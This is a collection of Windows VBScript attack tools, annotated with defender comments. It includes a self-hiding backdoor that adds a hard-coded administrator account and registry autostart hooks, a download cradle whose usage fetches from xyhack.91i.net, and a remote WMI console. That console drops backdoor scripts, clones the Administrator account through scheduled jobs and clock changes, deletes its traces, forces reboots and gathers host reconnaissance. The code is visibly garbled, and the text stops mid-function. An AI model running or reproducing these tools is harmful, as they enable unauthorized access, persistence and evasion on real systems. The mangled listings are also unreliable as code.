Several VBS file code


Door.vbs

'**************

'door.vbs by black 嘿 black

'**************

' Self-hiding dropper: plants a local administrator account and several autostart hooks.
' This listing is extraction-garbled ("/" printed where Windows paths use "\", broken quoting,
' one statement split over two printed lines), so it is not runnable as printed; read it for the
' artefacts it leaves, which are what a defender would hunt for.
DIM WSH, FA, FSO

SET FSO = CreateObject ("scripting.filesystemObject")

' Handle to this script's own file so it can mark itself hidden below.
Set fa = fso.getfile (wscript.scriptfullname)

' 34 = Hidden (2) + System (32) in the Scripting FileAttribute constants: hides the script from default Explorer views.
Fa.attributes = 34

SET WSH = CreateObject ("wscript.shell")

' Creates a local account with a hard-coded password, then elevates it. Window hidden (0), synchronous (True).
' Host detection: Security events 4720 (user created) and 4732 (member added to local group), and a
' hidden-window script host spawning net.exe.
Wsh.Run "Net User iuse_server xyhack.91i.net / add", 0, true

Wsh.run "Net localgroup administrators iuse_server / add", 0, true

' Run-key persistence under the value name "Win32". As printed the data is the literal text "& Fa &"
' (the ampersands sit inside the quotes), not the script path — almost certainly extraction damage,
' so hunt for the value name rather than the literal.
Wsh.Regwrite "HKLM / Software / Microsoft / Windows / CurrentVersion / Run / Win32", "& Fa &"

' One statement printed over two lines: sets Explorer's SHOWALL CheckedValue to 0, the well-known
' trick that keeps "Show hidden files" from revealing the hidden script. A write to this value from a
' script host is a strong indicator on its own.
Wsh.Regwrite

"HKLM / Software / Microsoft / Windows / Currentversion / Explorer / Advanced / Folder / Hidden / Showall / CheckedValue", 0, "Reg_dword"

' cmd.exe AutoRun: whatever is stored here runs every time cmd.exe starts, so the script is re-launched
' by ordinary shell use. Both HKLM and HKCU are written; both values should be audited (empty is the
' normal state). Quoting is broken in the listing (stray trailing quote) — extraction damage.
Wsh.Regwrite "HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Command Processor / Autorun", "& Fa &" "

Wsh.Regwrite "HKEY_CURRENT_USER / SOFTWARE / Microsoft / Command Processor / Autorun", "& Fa &" "

Function: Add a dead account (start with CMD), completely hide under Win.

Use: Run directly.

2. NTLM.VBS

'**************

'ntlm.vbs by black 嘿 black

'**************

' Reconfigures the Windows Telnet Server's NTLM authentication mode and listening port from the two
' command-line arguments, with no validation of either value. The registry key path is garbled by
' extraction (spaces and "/" inserted). Defender note: telnet is cleartext; any change to the Telnet
' Server NTLM/TelnetPort values, or the service being enabled at all, warrants review.
DIM WSH

SET WSH = CreateObject ("wscript.shell")

' Arguments(0) is written verbatim as a REG_DWORD (no range check).
Wsh.Regwrite "HKLM / Software / Microsoft / Telnet Server.0 / NTLM", WScript.Arguments (0), "REG_DWORD"

' Arguments(1) is written verbatim as the port, also unvalidated.
Wsh.Regwrite "HKLM / Software / Microsoft / TelnetServer.0 / Telnetport", WScript.Arguments (1), "Reg_dword"

Function: Customize the NTML and port of Telnet.

Use: d: /> ntml.vbs 1 999

3. Iget.vbs

'****************************

'Iget.vbs mod by black 嘿 black

'****************************

' Command-line download cradle: HTTP GET via XMLHTTP, then the raw response body is written to disk
' with ADODB.Stream. URL and output path come from the arguments, are lower-cased and are not
' validated. The listing is garbled ("creteObject", and "sget.type = 1" fused with "sget.open ()" on
' one line). Detection: script hosts making outbound HTTP followed by ADODB.Stream SaveToFile writes —
' a pattern shared by many VBS and Office-macro downloaders.
Set Xpost = CreateObject ("Microsoft.xmlhttp")

' Synchronous GET (third argument 0 = not asynchronous).
XPOST.OPEN "get", LCase (wscript.arguments (0)), 0

Xpost.send ()

Set sget = creteObject ("adodb.stream")

' Mode 3 = read/write, Type 1 = binary stream.
sget.mode = 3

sget.type = 1sget.open ()

sget.write (xpost.responsebody)

' SaveToFile option 2 = overwrite an existing file silently.
sget.savetofile lcase (wscript.arguments (1)), 2

Function: The http file is downloaded from the command line.

Use: d: /> igt.vbs http://xyhack.91i.net/vbs.rar vbs.rar

4. rcmd.vbs

'**************

'rcmd.vbs by black 嘿 black

'**************

' rcmd.vbs entry point: an interactive remote-administration/attack console over WMI (DCOM).
' Every later function ends by calling main() again, so control never returns here and the call
' stack only grows. The whole script runs under On Error Resume Next (the keyword is garbled as
' "ResMe" in the listing), so most failures below are silently ignored.
ON Error ResMe next

Set outstreem = wscript.stdout

Set instreem = wscript.stdin

' Re-launches itself under cscript.exe in a visible cmd window when started by double-click (wscript.exe).
IF (Lcase (Right (Wscript.Fullname, 11)) = "wscript.exe") THEN

Set objshell = wscript.createObject ("wscript.shell")

Objshell.Run ("cmd.exe / k cscript // nologo" & chr (34) & wscript.scriptfullname & chr (34))

END IF

IF wscript.Arguments.count <3 THEN

USAGE ()

WScript.echo "Not Enough Parameters."

WScript.quit

END IF

' Target IP, user name and password are taken straight from the command line: they are visible to
' anyone who can read process command lines (Security 4688 with command-line auditing, Sysmon 1),
' which is the easiest host-side indicator of this tool on the operator's machine.
ipaddress = wscript.arguments (0)

Username = wscript.arguments (1)

Password = wscript.arguments (2)

USAGE ()

OutStreem.write "Conneting" & ipaddress & "..."

' Remote WMI connection to root\cimv2 ("/" is an extraction artefact for "\"; "creteObject" likewise).
' On the target this appears as a network logon (4624, type 3) followed by WmiPrvSE.exe spawning
' cmd.exe for the commands issued later.
Set objlocator = creteObject ("wbemscripting.swbemlocator") '20

Set objswbemservices = objlocator.connectServer (iPaddress, "Root / Cimv2", UserName, Password)

' Enables privileges on the WMI connection. The numbers look like WbemPrivilegeEnum values
' (23 RemoteShutdown, 18 Shutdown, 7 Security, 11 SystemTime — confirm against the enum); the Security
' privilege is what later allows clog() to clear event logs.
Objswbemservices.security_.privileges.add 23, True

Objswbemservices.security_.privileges.add 18, True

Objswbemservices.security_.privileges.add 7, True

Objswbemservices.security_.privileges.add 11, True

' "ErrorNumber" is never assigned in this script (the real property is Err.Number); an undeclared
' variable is Empty, which compares equal to 0, so this branch never fires and "OK!" is printed even
' when the connection failed.
IF ErrorNumber <> 0 THEN

WScript.echo "Error!"

Call main ()

Else

WScript.echo "OK!"

END IF

Call main ()

'********************************************************** **********

' "Blank door": drops a second VBS (svrer.vbs) into %windir%\system32 on the target by chaining
' cmd.exe "echo ... >>" redirections through Win32_Process.Create, then runs it with cscript.
' From the echoed text, the dropped script (1) marks itself hidden+system, (2) writes a hidden
' system.bat that adds "iuse_server" to Administrators, (3) also runs those net commands directly,
' (4) writes the same Run-key / hidden-files / cmd AutoRun values as Door.vbs, and (5) schedules
' system.bat with "AT" at 20:00, 20:10, 20:20 and 20:30 so the account is re-created daily.
' The dropped file's name varies in this listing (svrer/svre/svracter.vbs) and the quoting is
' mangled — extraction damage; as printed the string does not parse.
' Hunt for: cmd.exe children of WmiPrvSE.exe writing *.vbs/*.bat into system32, AT jobs created
' from a remote session, and the registry values named above. Ends by re-entering main().
Function door ()

OutStreem.write "CREATING The Blankdoor .."

Set objinstproc = objswbemservices.get ("Win32_Process")

' Single command line (many continuation lines) that writes the dropper one echo at a time.
cmddoor = "cmd / c echo dim WSH, FA, FSO, T>% windir% / system32 / svrer.vbs" _

& "&& echo set fso = createObject (" Scripting.FilesystemObject "") >>% windir% / system32 / svre.vbs "_ &" && echo set fa = fso.getfile (wscript.scriptfullname) >>% windir% / System32 / svracter.vbs "_

& "&& echo fa.attributes = 34 >>% windir% / system32 / svrer.vbs" _

& "&& echo set t = fso.createtextfile (" "% windir% / system32 / system.bat" ", true) >>% windir% / system32 / svrer.vbs" _

& "&& echo t.writeline" ("Net user iuse_server xyhack.91i.net /add""">>%Windir%/system32/svre.vbs"

& "&& echo t.writeline (" Net localgroup administrators iuse_server /add"")>>%%Windir%/system32/svre.vbs "_

& "&& echo t.writeline (" "Attrib H% WINDIR% / System32 / System.bat" ") >>% windir% / system32 / svrer.vbs"

& "&& echo t.close >>% windir% / system32 / svrer.vbs" _

& "&& echo set wsh = creteObject (" Wscript.shell ") >>% windir% / system32 / svrer.vbs" _

& "&& echo wsh.run" "Net user iuse_server xyhack.91i.net /add"" ,0, path "%Windir%/system32/svrer.vbs"

& "&& echo wsh.run" "Net localgroup administrators iuse_server / add" ", 0, true >>% windir% / system32 / svre.vbs" _

& "&& echo wsh.regwrite

"HKLM / Software / Microsoft / WINDOWS / CURRENTVERSION / RUN / WIN / WIN / WIN32" "" ""% WINDIR% / SYSTEM32 / SVRER.VBS ">>% WINDIR% / system32 / svrer.vbs" _

& "&& echo wsh.regwrite

"HKLM / Software / Microsoft / Windows / Currentversion / Explorer / Advanced / Folder / Hidden / Showall / CheckedValue" ", 0," Reg_dword ">>% windir% / system32 / svrer.vbs" _

& "&& echo wsh.regwrite" "HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Command

Processor / autorun "", "% windir% / system32 / svrer.vbs" >>% windir% / system32 / svrer.vbs "_

& "&& echo wsh.regwrite" "HKEY_CURRENT_USER / SOFTWARE / Microsoft / Command

Processor / autorun "", "% windir% / system32 / svrer.vbs" >>% windir% / system32 / svrer.vbs "_

& "&& echo wsh.run" "CMD / C AT 20: 00, 20: 10, 20: 20, 20: 30% WINDIR% / System32 / System.bat" ", 0, TRUE

>>% windir% / system32 / svrer.vbs "

' Remote process creation of the echo chain; Showerror jumps back to main() on a non-zero Err.Number.
Objinstproc.create (cmddoor)

Showerror (Err.Number)

' Short fixed wait so the echo chain has finished before cscript is launched on the dropped file.
WScript.sleep (1500)

OutStreem.write "Runing the blankdoor .."

Objinstproc.create ("CMD / C CScript% Windir% / System32 / SVRER.VBS")

Showerror (Err.Number)

Call main ()

END FUNCTION

'********************************************************** **********

' "Clone account": makes an existing local account behave as the built-in Administrator by copying
' the SAM "F" value of RID 0x1F4 (500 = Administrator) onto the chosen user's SAM key. Because the
' SAM hive is writable only by SYSTEM, the registry copy (ca.vbs) is executed through the Schedule
' service: a helper (getsys.vbs) sets the target's clock to 23:58:59, queues "AT 23:59 cscript ca.vbs",
' waits, and restores the time; ca.vbs then sets a "Caflag" value under
' HKLM\Software\Microsoft\Windows Script Host\Settings as a completion signal that this function polls.
' Defender indicators: system-time-change events (4616), Schedule service start-mode/state changes,
' AT jobs created remotely, any write under HKLM\SAM by a script host, and the Caflag value itself.
' The listing is garbled throughout (fused lines, missing "&", "FLASE"); not runnable as printed.
Function CA ()

WScript.echo "Enter the causername:"

Causername = wscript.stdin.readline ()

Wscript.echo "Enter the Capassword:"

Capassword = wscript.stdin.readline ()

OutStreem.write "getting sid of" & causername & "..."

' WQL built by concatenating stdin input inside quotes (no escaping); "FROM" is missing as printed.
Set colinstsid = objswbemservices.execQuery ("SELECT * WIN32_USERACCOUNT WHERE Name =" & Chr (34) & Causername & Chr (34))

For Each Objinstsid in Colinstsid

strsid = Objinstsid.sID

' RID = text after the last "-" of the SID, hex-encoded and zero-padded to 8 characters: this is the
' SAM\Domains\Account\Users\<RID> key name used for the target user below.
SIDFLAG = Right (strsid, len (strsid) -instrrev (strsid, "-")))

Strflag = CSTR (HEX (Sidflag))

RegName = String (8-Len (strflag), "0") & strflag

NEXT

' Garbled: originally an empty-SID check that reports a missing user and returns to the menu.
If strsid = "" "& vbcrlf &" username is not exist. "

Call main ()

Else

WScript.echo "OK!"

END IF

OutStreem.write "prepairing .."

Set objinstproc = objswbemservices.get ("Win32_Process")

Showerroronly (Err.Number)

' ca.vbs: GetBinaryValue of the Administrator "F" value, SetBinaryValue onto the target RID's key, then
' write the Caflag completion marker. Lines are fused/mangled in the listing.
CMDLINE = "cmd / c echo set oreg = getObject (" Winmgmts: root / default: stdregprov ")>% temp% / ca.vbs" _

& "&& echo oreg.getbinaryValue ^ & H80000002," Sam / Sam / Domains / Account / Users0001F4 "", "F" ", UValue >>% TEMP% / CA.VBS" _

& "&& echo oreg.setbinaryValue ^ & H8000000002," SAM / SAM / DOMAINS / Account / Users / "? Name &" "" "F" ", UVALUE >>% TEMP% / CA.VBS" _

& "&& echo set sh = creteObject (" Wscript.shell ") >>% temp% / ca.vbs"

& "HKLM / Software / Microsoft / Windows Script Host / Settings / Caflag" "," 1 ">>% Temp% / CA.vbs"

Objinstproc.create (cmdline)

Showerroronly (Err.Number)

' getsys.vbs: clock manipulation plus an AT job so ca.vbs runs as SYSTEM about a second later; the
' saved time is restored afterwards. The final Objinstproc.create is fused onto the last string line.
cmdline = "cmd / c echo atime = TIME>% temp% / getsys.vbs" _

& "&& echo set sh = creteObject (" Wscript.shell ") >>% temp% / getsys.vbs"

& "&& echo sh.run" "CMD / C at 23:59 CScript% Temp% / CA.VBS" "", 0, True >>% TEMP% / Getsys.vbs "_

& "&& echo sh.run" "CMD / C TIME 23: 58: 59.90" ", 0, True >>% TEMP% / Getsys.vbs" _

& "&& echo wscript.sleep (1100) >>% TEMP% / getsys.vbs" _

& "&& echo sh.run" CMD / C Time "" ^ & Atime, 0, True >>% TEMP% / Getsys.vbs "Objinstproc.create (cmdline)

Showerror (Err.Number)

OutStreem.write "processing."

' The Schedule (Task Scheduler) service must be running for AT: it is temporarily enabled/started here
' and restored below. Flag1/Flag2 remember what was changed. "FROM" is missing as printed.
Set colinstsvr = objswbemservices.execQuery ("SELECT * WIN32_SERVICE WHERE Name = 'Schedule')

Showerroronly (Err.Number)

For Each Objinstsvr in Colinstsvr

Flag1 = 0

Flag2 = 0

IF objinstsvr.startmode = "disabled" then

Objinstsvr.changeStartMode ("manual")

Flag1 = 1

END IF

' "FLASE" is an undeclared name (Empty), which compares equal to False, so in effect this fires when
' the service is not running — works by accident rather than design.
IF Objinstsvr.Started = FLASE THEN

Errnumber = Objinstsvr.StartService ()

Flag2 = 1

END IF

Showerroronly (Err.Number)

Objinstproc.create ("CMD / C CScript% Temp% / Getsys.vbs")

Showerroronly (Err.Number)

' Second WMI connection to root\default for StdRegProv, used only to poll the completion flag.
Set objinstreg = objlocator.connectServer (iPaddress, "root / default", username, password) .get ("stdregprov")

' Polls Caflag up to 20 x 500 ms (about 10 s) for the scheduled job to finish.
For i = 1 to 20

Objinstreg.getstringValue & H80000002, "Software / Microsoft / Windows Script Host / Settings", "Caflag", Svalue

If svalue = "1" THEN

EXIT for

Else

WScript.sleep (500)

END IF

NEXT

' Resets the account password; the concatenation is garbled in the listing.
Objinstproc.create ("Net User" & Causername & "& Capassword)

If Flag1 Then Objinstsvr.changeStartMode ("Disabled")

IF flag2 Then Objinstsvr.stopservice ()

NEXT

IF Svalue <> "1" THEN

WScript.echo "Error." & vbcrlf & "Waiting Time Out."

Else

Showerror (Err.Number)

END IF

' Clean-up deletes the helper scripts and the flag value, which hampers later forensics; %TEMP%
' here is resolved on the target, under the account the WMI-created cmd.exe runs as.
OutStreem.write "clean up .."

Objinstproc.create ("CMD / C DEL% TEMP% / CA.VBS")

Showerroronly (Err.Number)

Objinstproc.create ("CMD / C DEL% TEMP% / Getsys.vbs")

Showerroronly (Err.Number)

if Svalue = "1" Then Objinstreg.deletevalue & H80000002, "Software / Microsoft / Windows Script Host / Settings", "Caflag" Showerror (Err.Number)

Call main ()

END FUNCTION

' Progress/error reporter used between steps: on error prints "Error 0X<hex>" plus the description
' and jumps back to the main menu; on success prints a single progress dot. The condition ("dam") and
' a closing parenthesis are lost to extraction (originally a "<> 0 THEN" test). Note it reports
' Err.Number rather than the ERRORNUMBER argument it was given, and "Call main ()" never returns,
' so the rest of the caller is skipped on error.
Function showerroronly (ERRORNUMBER)

IF errornumber dam

Wscript.echo "Error 0X" & CSTR (HEX (Err.Number) & "."

IF Err.Description <> "" "" "

WScript.echo "Error Description:" & Err.Description & "."

END IF

Call main ()

Else

Outstreem.write "."

END IF

END FUNCTION

'********************************************************** **********

' Sub-menu for share administration on the target (list / create / delete). Input is read from
' stdin; unrecognised input falls out of the Select and the function returns to its caller.
Function Share ()

WScript.echo String (18, "-")

Wscript.echo "0. Return to cmd> ="

WScript.echo "1. List the sharing information: ="

WScript.echo "2. Create shared ="

Wscript.echo "3. Delete shared ="

WScript.echo String (18, "-")

Wscript.echo "please chose the parameter:"

Parameters = wscript.stdin.readline ()

' Case labels are case-sensitive string matches ("List" but not "list", etc.).
SELECT CASE Parameters

Case "quit", "0"

Main ()

Case "List", "1"

Listshare ()

Case "Open", "2" '40

Openshare ()

Case "Close", "3"

CloseShare ()

End SELECT

END FUNCTION

' Enumerates Win32_Share on the target (share recon) and prints caption/name/path, then re-enters
' the share menu. "Call share () end function" is one fused line in the listing; the header text
' "pat" (for "path") is as printed.
Function Listshare ()

OutStreem.write "Listing The Netshare from" & ipaddress & "...."

SET colshares = objswbemservices.execQuery ("SELECT * from Win32_Share")

Showerror (Err.Number) '50

WScript.echo _

("CAPTION" & Chr (9) & chr (9) & "name:" & chr (9) & chr (9) & "pat")

For Each Objshare in colshares

WScript.echo _

(Objshare.caption & chr (9) & objshare.name & chr (9) & chr (9) & objshare.path)

NEXT

Wscript.echo vbcrlf & "All Share Have Been Listed SuccessFully!"

Call share () end function

' Creates a new share on the target via Win32_Share.Create: type 0 (disk), at most 25 connections,
' description "Default Sharing". No security descriptor is supplied, so the share gets the class
' default permissions. "Objnewshare.create_" is a garbled line continuation ("Create _").
' Detection on the target: Security 5142 (network share object added).
Function OpenShare ()

Wscript.echo "Enter the path:" 70

Path = wscript.stdin.readline ()

Wscript.echo "Enter the name:"

SNAME = wscript.stdin.readline ()

Const file_share = 0

Const Maximum_Connections = 25

Set objnewshare = objswbemservices.get ("Win32_share")

' Return value is captured in ErrreTurn but never checked.
ErrreTurn = Objnewshare.create_

(Path, Sname, File_Share, _

Maximum_Connections, "Default Sharing")

Wscript.echo "The Share Have Been Ceated Success FuL"

Call share ()

END FUNCTION

' Deletes a share by name. The function name "clos Hare" is an extraction split of "CloseShare".
' The WQL filter is built by string concatenation from stdin with only a lone closing quote
' ("" & kname & "'"), so as printed it is malformed, and in any form it is injectable; a maintained
' tool would escape the name. Detection on the target: Security 5144 (network share object deleted).
Function clos Hare ()

Wscript.echo "Plese Enter the name:"

KName = wscript.stdin.readline ()

Outstreem.write "killing the" & kname & "..."

SET colshares = objswbemservices.execQuery_

("Select * from win32_share where name =" & "" & kname & "'")

For Each Objshare in colshares

Objshare.delete

NEXT

Showerror (Err.Number)

Call share ()

END FUNCTION

'********************************************************** **********

' Lists every service with state, start mode and binary path (service recon). "LEN (ObjService.Name <8"
' has lost its closing parenthesis; "Vbcrf" is an undeclared name (Empty) rather than vbCrLf; the final
' "Call main ()" is fused onto the echo line — all extraction damage.
Function Listsvr ()

OutStreem.write "Listing The Service from" & ipaddress & "..."

Set collistofservices = objswbemservices.execQuery_

("Select * from win32_service")

Showerror (Err.Number)

WScript.echo _

("Name" & chr (9) & chr (9) & "State" & chr (9) & chr (9) & "mode" & chr (9) & "path name")

For Each ObjService in CollistofServices

' Extra tab for short names so the columns line up.
IF LEN (ObjService.Name <8 THEN

Strname = ObjService.Name & Chr (9)

Else

Strname = ObjService.name

END IF

WScript.echo _

(Strname & Chr (9) & objService.State & Chr (9) & chr (9) & objService.Startmode & Chr (9) & objService.pathname)

NEXT

WScript.echo Vbcrf & "All Services Have Been Listed SuccessFully!" Call main ()

END FUNCTION

'********************************************************** ***********

' Forces a reboot of the target through Win32_OperatingSystem.Win32Shutdown(6); in that method's
' flag set 6 = Reboot (2) + Force (4), so logged-on users are not prompted and unsaved work is lost.
' The WQL lacks "FROM" as printed. Detection: System log 1074 with a remote WMI caller; RS() relies
' on this reboot to activate its Terminal Services changes.
Function reboot ()

OutStreem.write "now, restarting target ...."

StrwqlQuery = "SELECT * WIN32_OPERATINGSYSTEM Where primary = 'true'"

Set colinstances = objswbemservices.execQuery (strwqlQuery)

For Each Objinstance in Colinstances

Objinstance.win32shutdown (6)

NEXT

Showerror (Err.Number)

Call main ()

END FUNCTION

'********************************************************** ************

' Remote host inventory over WMI: computer system, OS, CPU, memory, BIOS, display, disks, logical
' drives, NIC configuration, hot fixes, and installed applications read from the Uninstall registry
' key through StdRegProv. Output goes through WNL. Many lines are fused or have lost "&"/"+"/commas
' in the listing (e.g. "Redim Str (Ubound (KeyArray) 1)", "Fork = 0", "J = J 1", the Space() header
' lines), so it is not runnable as printed. From a defender's view this is the reconnaissance step:
' a burst of WMI class enumerations plus an Uninstall-key walk from a remote DCOM session.
Function INF ()

Outstreem.write "getting infomation from" & ipaddress & "..."

' Objget returns the last instance of the named class (see helper below).
Set obj1 = objget ("win32_computersystem")

Showerror (Err.Number)

Wscript.echo "" & vbcrlf

Set obj2 = Objget ("Win32_Operatingsystem")

Set col3 = objswbemservices.instancesof ("Win32_Processor")

Set obj4 = objget ("Win32_LogicalMemoryConfiguration")

Set obj5 = Objget ("Win32_BIOS")

Set obj6 = Objget ("Win32_DisplayConfiguration")

Set col7 = objswbemservices.instancesof ("win32_diskdrive")

Set col8 = objswbemservices.instancesof ("Win32_LogicalDisk")

Set col9 = objswbemservices.instancesof ("Win32_NetworkAdapterConfiguration")

' Class name misspelt as printed ("quickfixenngineering").
Set col10 = objswbemservices.instancesof ("win32_quickfixenngineering")

WNL "OS INFO:"

WNL "Computer Name:" & obj1.name

WNL "User Name:" & obj1.username

WNL "Domain:" & obj1.domain

Domainrole = ""

' Maps Win32_ComputerSystem.DomainRole codes to labels; "Case 3" is fused onto the previous line.
Select Case Obj1.domainRole

Case 0

Domainrole = "Workstation"

Case 1

Domainrole = "Member Workstation"

Case 2

DomainRole = "Server" case 3

DomainRole = "Member Server"

Case 4

Domainrole = "Backup Domain Controller"

Case 5

Domainrole = "Main Domain Controller"

End SELECT

With obj2

WNL "Domain Role:" & DomainRole

WNL "CAPTION:" & .caption

WNL "Organization:" & .organization

WNL "Registered User:" & .registereduser

WNL "Install Date:" & TimeFormat (.installDate)

WNL "Last Bootup Time:" & TimeFormat (.lastbootuptime)

WNL "Windows Directory:" & .windowsDirectory

WNL "System Directory:" & .systemDirectory

WNL "Boot Device:" & .bootdevice

WNL "Country Code:" & .countrycode

Wnl "CSName:" & .csname

WNL "Description:" & .description

WNL "Manufacturer:" & .manufacturer

WNL "Serial Number:" & .serialnumber

WNL "Version:" & .version

WNL "System Type:" & obj1.systemtype

WNL "System Startup Delay:" & obj1.systemStartUpdelay & "S"

Wnl "System Startup Options:" & obj1.systemStartupOptions (0)

For i = 1 to Ubound (Obj1.systemStartupOptions)

WNL Space (28) & obj1.systemStartupOptions (i)

NEXT

End with

WNL VBCRLF & "Processor Info:"

Wnl "Number of Processors:" & obj1.numberofprocessors

For Each Obj3 in col3

With Obj3

WNL "Device ID:" & .DeviceID

Wnl "name:" & .name

Wnl "Current Clock Speed:" & .CurrentClockSpeed ​​& "MHz"

WNL "Description:" & .description

WNL "Ext Clock:" & .extClock & "MHz"

WNL "L2 Cache Size:" & .l2cachesize & "KB" WNL "L2 Cache Speed:" & .l2cachespeed & "MHz"

WNL "Processor ID:" & .processorid

WNL "Manufacturer:" & .manufacturer

WNL "Socket Designation:" & .socketDesignation

WNL "Address Width:" & .addresswidth & "Bit"

WNL "Data Width:" & .dataWidth & "Bit"

End with

NEXT

WITH OBJ4

WNL VBCRLF & "Memory Info:"

' Values are KB in these classes; /1024 gives MB. CInt overflows above 32767 MB (masked by Resume Next).
WNL "Total Physical Memory:" & CINT (.totalphysicalMemory / 1024) & "MB"

WNL "free Physical Memory:" & CINT (Obj2.freePhysicalMemory / 1024) & "MB"

WNL "Total Pagefile Space:" & CINT (.totalpageFilespace / 1024) & "MB"

WNL "Total Virtual Memory:" & CINT (.totalvirtualMemory / 1024) & "MB"

WNL "Available Virtual Memory:" & CINT (.availableVirtualMemory / 1024) & "MB"

End with

WNL VBCRLF & "BIOS INFO:"

WNL "Description:" & obj5.description

WNL "Current Language:" & obj5.currentlanguage

WNL "Version:" & obj5.version

WNL "Manufacturer:" & obj5.manufacturer

With obj6

WNL VBCRLF & "Display Configuration:"

WNL "CAPTION:" & .caption

WNL "Device Name:" & .DeviceName "

WNL "Driver Version:" & .driverVersion

WNL "Display Frequency:" & .displayFrequency & "HZ"

WNL "BITS Per Pel:" & .bitsperpel & "Bit"

Wnl "PELS:" & .pelswidth & "x" & .pelsheight

End with

WNL VBCRLF & "Disk Info:"

For Each Obj7 in col7

WITH OBJ7

WNL "DeviceID:" & .Deviceidwnl "CAPTION:" & .caption

WNL "Interface Type:" & .InterfaceType "

WNL "SCSI bus:" & .scsibus

WNL "SCSI Logical Unit:" & .scsilogicalUnit

WNL "SCSI Port:" & .scsiPort

WNL "SCSI TargetID:" & .scsiTargetID

Wnl "Sectors Per TRACK:" & .sectorspertrack & "kB"

WNL "Partitions:" & .Partitions

WNL "Size:" & sizeFormat (.size)

End with

NEXT

' Column header for the logical-drive table; the "&" operators are missing as printed.
Str = "Volume" Space (2) "Type" Space (8) "Format" Space (4)

Str = STR "SIZE" Space (6) "Free" Space (12) "label"

WNL STR

For Each Obj8 in COL8

With obj8

DriveType = "" "

' Win32_LogicalDisk.DriveType codes to labels.
SELECT CASE.DRIVETYPE

Case 0

DriveType = "unknow"

Case 1

DriveType = "Norootdir"

Case 2

DriveType = "removeable"

Case 3

DriveType = "fixed"

Case 4

DriveType = "network"

Case 5

DriveType = "CD-ROM"

Case 6

DriveType = "RAM"

End SELECT

Strpercent = ""

if .size <> "" and .freespace <> "" ""

Strpercent = "(" & FormatperCent (.freespace / .size, 0) ""

END IF

' WSP pads each field to a fixed width (see helper below).
Str = "" & WSP (.caption, 8) & WSP (DRIVETYPE, 12) & WSP (.FileSystem, 10) & WSP (SizeFormat (.size), 10)

Str = Str & WSP (SizeFormat (.Freespace) & strpercent, 16) &. Volumename

WNL STR

End with

NEXT

WNL VBCRLF & "NIC Informaton:"

For Each Obj9 in col9

With Obj9

' Only IP-enabled adapters are listed; array-valued properties go through WFL.
if.ipenabled then

WNL "INDEX:" & .index

WNL "Description:" & .description

WNL "DHCP Enabled:" & .dhcPENABLED

Wnl "DHCP Server:" & .dhcpserverwnl "DNS Host Name:" & .dnshostname

WNL "DNS Server Search Order:" & WFL (.dnsserversearchOrder)

WNL "WINS Primary Server:" & .winsprimaryServer

WNL "IP Address:" & WFL (.ipaddress)

WNL "Mac Address:" & .macaddress

WNL "Default IP Gateway:" & wfl (.defaultiPgateway)

WNL "IP Subnet:" & WFL (.ipsubnet)

WNL "IP Filter Security Enabled:" & .IpfiltersecurityEnable

WNL "IPsec Permit IP Protocols:" & WFL (.ipsecPermitipprotocols)

WNL "IPsec Permit TCP Ports:" & WFL (.ipsecPermittcpports)

WNL "IPsec Permit UDP Ports:" & WFL (.ipsecPermitudpports)

END IF

End with

NEXT

WNL VBCRLF & "Hot Fixes INFO:"

For Each Obj10 in col10

WNL "Hot Fix ID:" & obj10.hotfixid

WNL "FIX Comments:" & obj10.fiXcomments

WNL "Install Date:" & obj10.installdate

WNL "Service Pack in Effect:" & obj10.servicePackineffect

NEXT

WNL VBCRLF & "Applications:"

' Separate root\default connection for StdRegProv; walks HKLM\...\Uninstall and collects DisplayName.
Set objswb1 = objlocator.connectServer (iPaddress, "root / default", username, password)

Set Obj11 = objswb1.get ("stdregprov")

HKLM = & h80000002

Keypath = "Software / Microsoft / Windows / CurrentVersion / Uninstall /"

Obj11.enumkey HKLM, Keypath, KeyArray

Redim Str (Ubound (KeyArray) 1)

J = 0

For i = 0 to Ubound (keyArray)

Obj11.getstringValue HKLM, Keypath Keyarray (i), "DisplayName", Strvalue

' As printed this tests "strval", which is never assigned (Empty), rather than Strvalue, so the
' list would stay empty even if the rest parsed.
IF strval <> "" ""

Str (j) = Strvalue

J = J 1

END IF

NEXT

' Case-insensitive bubble sort (StrComp mode 1) of the collected names; "Fork" is "For k" fused.
IF J> 1 THEN

For i = 0 to j-1

Fork = 0 to j-i-1

IF STRComp (STR (K), STR (K 1), 1) = 1 THEN

Strtemp = STR (k 1) STR (k 1) = STR (k)

STR (k) = strTemp

END IF

NEXT

NEXT

END IF

For i = 0 to j-1

WNL "& STR (i)

NEXT

Wscript.echo "" & vbcrlf

WScript.echo "The Infomation from & ipaddress & Had Been Listed SuccessFully!"

Call main ()

END FUNCTION

' Writes one line to the console and, if a global "of" object exists (never declared in this listing —
' presumably an optional output file; confirm), to that as well. "Showerror ()" is called without its
' argument, which raises a wrong-number-of-arguments error that the surrounding On Error Resume Next
' swallows. "IF isobject (of)." has lost its THEN.
SUB WNL (MSG)

WScript.echo MSG

IF isobject (of).

ON Error ResMe next

Of.writeLine MSG

Showerror ()

ON Error Goto 0

END IF

End Sub

' Joins the elements of an array (IP/DNS lists) into one string. The initial assignment is garbled
' ("" ") and the per-element suffix prints as an empty string — presumably a space separator lost to
' extraction. Raises (masked) when Obj is not an array.
Function WFL (Byref Obj)

Str = "" "

For i = 0 to Ubound (obj)

Str = Str & Obj (i) & ""

NEXT

WFL = STR

END FUNCTION

' Pads MSG into a NUM-character column: truncates to NUM-1 characters, then right-pads with spaces;
' an empty MSG yields NUM spaces. The IF line has lost its THEN in the listing.
Function WSP (MSG, NUM)

IF MSG <> "" "

MSG = Left (MSG, NUM-1)

WSP = MSG & Space (Num-Len (MSG))

Else

WSP = space (NUM)

END IF

END FUNCTION

' Reformats a WMI CIM_DATETIME string (yyyymmddHHMMSS...) into a "yyyy/mm/dd HH:MM:SS"-style string
' by slicing fixed offsets. Quoting and one comma ("MID (MSG 11, 2)") are mangled in the listing.
' No length check, so a short or empty value raises at runtime (masked by Resume Next).
Function TimeFormat (MSG)

TimeFormat = Left (MSG, 4) & "/" & MID (MSG, 5, 2) & "& MID (MSG, 7, 2) &" & MID (MSG, 9, 2) & ":" & MID (MSG 11, 2) & ":" & MID (MSG, 13, 2)

END FUNCTION

' Formats a byte count: MB with one decimal, or GB with two decimals once the value exceeds 1024 MB.
' Returns Empty for an empty input (no Else branch). The IF line has lost its THEN in the listing.
Function SizeFormat (MSG)

IF MSG <> "" "

Size = msg / 1048576

IF size> 1024 THEN

SizeFormat = Round (Size / 1024, 2) & "GB"

Else

